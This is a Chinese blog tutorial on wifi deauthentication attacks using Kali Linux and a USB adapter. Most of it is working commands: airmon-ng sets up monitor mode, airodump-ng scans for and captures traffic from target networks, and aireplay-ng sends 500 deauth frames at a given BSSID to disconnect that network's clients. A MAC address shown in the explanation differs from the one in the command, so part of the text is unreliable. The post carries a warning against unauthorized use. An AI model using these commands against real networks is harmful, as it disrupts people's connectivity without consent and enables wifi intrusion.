1.准备免驱网卡,十几块钱嘎嘎板正

2.将网卡差在主机上(虚拟机需要选择连接在虚拟机上)主机会自动连接

3.检查网卡

sudo su

开启root模式 初始密码kali

ifconfig

d358ad04f61cf4aea530c167119787d1

检查网卡 出现wlan0即为成功

3开启网卡的监听模式

airmon-ng start wlan0

名词解释

Bssid –无线路由的Mac地址

Pwr –附近wifi信号的强度

#Data 捕获到的数据包

CH –无线路由的信道

ESSID wifi名称

如图

4.开启网卡进行扫描

airodump-ng wlan0mon

如图

CTRL+C停止扫描

4.开启监听

airodump-ng --bssid (上面扫描到的bssid数值) -c(CH数值)–write qyyy wlan0mon

5.开始装X

aireplay-ng -a(上方bssid数值) -0 500 wlan0mon

注:Ctrl+C停止攻击

不要攻击未经允许的wifi,违法的!
# 重新运行 airodump-ng,专注于频道 6 并观察目标 BSSID 是否存在
airodump-ng -c 6 wlan0mon

  1. 命令 iwconfig wlan0mon channel 11
    作用:将无线网卡(wlan0mon)强制锁定到频道 11
    各部分含义:
    iwconfig:Linux 系统中用于配置无线网卡参数的命令
    wlan0mon:处于监控模式(monitor mode)的无线网卡接口名
    channel 11:指定要锁定的频道为 11(与目标 WiFi 的频道一致)

  2. 命令 aireplay-ng -a 76:CE:C0:86:FC:EC -0 500 wlan0mon
    作用:向目标 WiFi 发送大量断开连接帧,使连接的设备暂时掉线
    各参数含义:
    aireplay-ng:用于无线数据包注入和攻击的工具
    -a 52:AD:3E:6D:98:CC:指定目标 WiFi 的 BSSID(MAC 地址)
    -0 500:表示发起 Deauthentication 攻击(-0是攻击模式),发送 500 个断开帧
    wlan0mon:使用该监控模式网卡进行攻击

{
airodump-ng --essid “oppo a6” wlan0mon 扫面固定的wifi名
}
别还没学多少kali,牢饭就吃饱了❤️
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

原文链接:https://blog.csdn.net/maniubip/article/details/140434049